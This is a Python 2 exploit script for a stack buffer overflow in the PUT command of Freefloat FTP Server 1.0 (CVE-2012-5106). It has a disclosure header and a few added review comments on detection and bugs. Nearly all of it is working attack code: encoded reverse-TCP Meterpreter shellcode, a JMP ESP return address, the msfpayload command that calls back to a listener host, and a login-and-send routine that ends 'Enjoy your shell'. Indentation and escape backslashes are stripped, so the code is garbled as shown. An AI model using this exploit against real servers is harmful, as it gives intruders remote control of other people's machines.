# Title : Freefloat FTP Server PUT Command Buffer Overflow
# Published : 2012-10-30
# Author :
#!/usr/bin/python
#########################################################################################################################################
# Title************************Freefloat FTP Server PUT Command Buffer Overflow
# Discovered and Reported******22nd of September, 2012
# Discovered/Exploited By******Jacob Holcomb/Gimppy042
# Software Vendor**************http://www.freefloat.com/
# CVE for PUT Overflow*********CVE-2012-5106
# Exploit/Advisory*************http://infosec42.blogspot.com/2012/09/freefloatftp-10-put-buffer-overflow.html
# Software*********************Freefloat FTP Server Version 1.0
# Tested Platform**************Windows XP Professional SP2
# Date*************************22/09/2012
#
#Credits for original Buffer Overflow discovery in FreeFloatFTP 1.0 go to
#Veerendra G.G of SecPod Technologies
#For first discovering that FreeFloat FTP had several FTP commands that could cause a Stack Based overflow condition.
#
#In my disclosure to FreeFloat, I reported my discovery and notified them that other exploits for various FTP commands supported by
#the FreeFloat FTP existed on the internet just to be assured they knew as SecPod reported their findings last year. They responded and
#acknowledged my discovered vulnerability along with the others in the wild. They also stated the following...
#"In fact we have issued an end of life for the software and it will be taken off-line October 1st."
#
#PS - This is a good piece of software to practice Stack Based Buffer Overflows if you curiouz and want to learnz
#########################################################################################################################################
import socket
# Interactive driver for CVE-2012-5106 (Freefloat FTP Server 1.0, see header).
# Flow: prompt for target and FTP credentials, open one TCP connection to
# port 21, complete a normal USER/PASS exchange, then send a single "put "
# command whose argument is the assembled buffer below.
# Defender's view: on the wire this is an authenticated session followed by
# one PUT line far longer than any legitimate filename (its length is printed
# before sending), which is the observable characteristic for FTP log review
# and IDS signatures. The vendor declared end-of-life for this product (see
# header), so removal rather than patching is the mitigation.
# Python 2 code (print statement, raw_input). Returns None; all errors raised
# inside the try block are swallowed by the bare except at the end.
def Overflow():
print "[!!!!] INSTRUCTIONS:nn[*] Use the commeneted out msfpayload command to generate shellcode for your environment and replace the shellcode variable with your shellcoden[*] Make sure you start a proper listener if using reverse shellnn"
# Target host and credentials are supplied by the operator; the port is fixed.
server = raw_input("n[*] Please enter the IP address of a server you wish to exploit:nn>")
port = int(21)
user = raw_input("n[*] Please enter a username for the FTP server:nn>")
password = raw_input("n[*] Please enter a password for username:nn>")
cmd = "put "
# Filler segments: 32, 247 and 65 repetitions of the filler string. Their
# positions in the final buffer are fixed by the concatenation below.
nopsled = "x90" * 32
junk = "x90" * 247
junk2 = "x90" * 65
ret_addr = "xEDx1Ex94x7C" #7C941EED - FFE4 - JMP ESP <NTDLL.dll XP sp2> - Dont forget little endian!
#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=2107 EXITFUNC=thread R | msfencode -c 1 -e x86/shikata_ga_nai -b "x00x0ax0dx20x7b" R
# Payload bytes emitted by the msfpayload command above; they are bound to
# the LHOST/LPORT shown in that command line.
shellcode = ("xdbxc3xd9x74x24xf4xbdx06xbdx1fxaax5fx33xc9" +
"xb1x49x31x6fx19x83xefxfcx03x6fx15xe4x48xe3" +
"x42x61xb2x1cx93x11x3axf9xa2x03x58x89x97x93" +
"x2axdfx1bx58x7exf4xa8x2cx57xfbx19x9ax81x32" +
"x99x2bx0ex98x59x2axf2xe3x8dx8cxcbx2bxc0xcd" +
"x0cx51x2bx9fxc5x1dx9ex0fx61x63x23x2exa5xef" +
"x1bx48xc0x30xefxe2xcbx60x40x79x83x98xeax25" +
"x34x98x3fx36x08xd3x34x8cxfaxe2x9cxddx03xd5" +
"xe0xb1x3dxd9xecxc8x7axdex0exbfx70x1cxb2xc7" +
"x42x5ex68x42x57xf8xfbxf4xb3xf8x28x62x37xf6" +
"x85xe1x1fx1bx1bx26x14x27x90xc9xfbxa1xe2xed" +
"xdfxeaxb1x8cx46x57x17xb1x99x3fxc8x17xd1xd2" +
"x1dx21xb8xbaxd2x1fx43x3bx7dx28x30x09x22x82" +
"xdex21xabx0cx18x45x86xe8xb6xb8x29x08x9ex7e" +
"x7dx58x88x57xfex33x48x57x2bx93x18xf7x84x53" +
"xc9xb7x74x3bx03x38xaax5bx2cx92xc3xf1xd6x75" +
"x2cxadxd8xf0xc4xafxdaxf2x2fx26x3cx68x40x6e" +
"x96x05xf9x2bx6cxb7x06xe6x08xf7x8dx04xecxb6" +
"x65x61xfex2fx86x3cx5cxf9x99xebxcbx06x0cx17" +
"x5ax50xb8x15xbbx96x67xe6xeexacxaex72x51xdb" +
"xcex92x51x1bx99xf8x51x73x7dx58x02x66x82x75" +
"x36x3bx17x75x6fxefxb0x1dx8dxd6xf7x82x6ex3d" +
"x06xffxb8x78x8cx09xcfx68x4c")
#Fuzz Buffer
#buffer = "PUT " + "x90" * 720
#Exploit Buffer
# Final PUT argument, in order: command word, junk, ret_addr, nopsled,
# shellcode, junk2.  NOTE: the name shadows the Python 2 builtin `buffer`
# for the rest of this function.
buffer = cmd + junk + ret_addr + nopsled + shellcode + junk2
print "n[*] Sending payload in attempt to overflow buffern[*] Your payload size is %sn" % len(buffer)
# Plain-text FTP session: banner, USER, PASS, then the oversized PUT.
# Each recv(1024) reads at most one chunk, so a reply split across
# segments would only be partially shown; the code never checks reply codes.
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server,port))
data = s.recv(1024)
print "[*] %s" %data
s.send("user " + user + "rn")
data = s.recv(1024)
print "[*] %s" %data
s.send("pass " + password + "rn")
data = s.recv(1024)
print "[*] %s" %data
s.send(buffer+"rn")
s.close()
print "nData was sent. Enjoy your shelln"
# NOTE(review): a bare except also catches KeyboardInterrupt and any bug in
# the block above, reports it as a connection problem, and leaves the socket
# unclosed on that path (there is no finally).
except:
print "nn[!!!!] There was an error connecting to the server and sending your buffer[!!!!] Please check the following...nn[*] Supplied IP addressn[*] Username and Passwordn[*] Is your target is online and running FreeFloat FTP servernn"
# Script entry point: prints the advisory banner, loops on a yes/no prompt
# until an exact "yes" or "no" is typed, and calls Overflow() only for "yes".
# Returns None.
def main():
# NOTE(review): this banner prints "CVE-2012-510"; the file header gives
# CVE-2012-5106.  The string is left untouched here.
print "nn# Title************************Freefloat FTP Server PUT Command Buffer Overflown# Discovered and Reported******22nd of September, 2012n# Discovered/Exploited By******Jacob Holcomb/Gimppy042n# Software Vendor**************http://www.freefloat.com/n# CVE for PUT Overflow*********CVE-2012-510n# Exploit/Advisory*************http://infosec42.blogspot.com/n# Software*********************Freefloat FTP Server Version 1.0n# Tested Platform**************Windows XP Professional SP2n# Date*************************22/09/2012nn"
# str(None) == "None", which matches neither answer, so the prompt is shown
# at least once.
contin = str(None)
while contin != "yes":
contin = raw_input("n[*] Please review the security advisory before proceeding to affirm this exploit is for your target[*]nWould you like to continue?nn>")
if contin == "no":
break
elif contin == "yes":
break
# BUG (benign here): `contin != "yes" or "no"` parses as
# `(contin != "yes") or "no"`, which is always truthy because "no" is a
# non-empty string.  It only acts as an `else` because the two exact-match
# branches above already break out of the loop.
elif contin != "yes" or "no":
print "nn[*] You responded with %s. Please respond with yes or no!nn"% contin
# Dispatch on the confirmed answer; any other value cannot reach here
# because the loop only exits on "yes" or "no".
if contin == "yes":
Overflow()
elif contin == "no":
print "n[!!!!] Hmmm..Guess you downloaded the wrong exploit...Back to scanning and enumeration [!!!!]n"
#Top-level script environment
# Run the interactive prompt only when executed directly, not on import.
if __name__ == "__main__":
main()